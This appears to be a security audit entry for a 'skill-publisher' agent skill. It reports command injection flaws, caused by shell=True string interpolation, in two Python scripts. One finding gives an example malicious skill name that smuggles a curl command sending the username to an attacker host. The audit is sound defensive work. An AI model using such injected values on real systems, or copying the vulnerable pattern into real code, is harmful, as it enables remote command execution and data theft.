The Agent Skills Directory

[COMMAND_EXECUTION]: Arbitrary command execution vulnerability in scripts/add_skill.py via untrusted data. The script extracts the 'name' and 'description' fields from the YAML frontmatter of a target skill's SKILL.md file. These values are then directly interpolated into shell command strings (e.g., git add {skill_name} and git commit -m "添加 {skill_name} skill") which are executed with shell=True. An attacker providing a skill with a name like "myskill; curl http://attacker.com/$(whoami); #" would trigger the execution of the injected command when the publisher skill is used.
[COMMAND_EXECUTION]: Command injection risk in scripts/init_repo.py. The script accepts a repository name as a command-line argument and interpolates it into a complex shell command for the GitHub CLI (gh repo create {repo_name} ...). Because the script uses shell=True, a malicious repository name could execute arbitrary commands on the host system.
[COMMAND_EXECUTION]: Insecure use of subprocess.run with shell=True. Both utility scripts in the skill employ shell execution for standard git and GitHub operations instead of using argument arrays. This practice bypasses shell escaping protections and creates a direct path for command injection when handling any data not strictly controlled by the script itself.

skill-publisher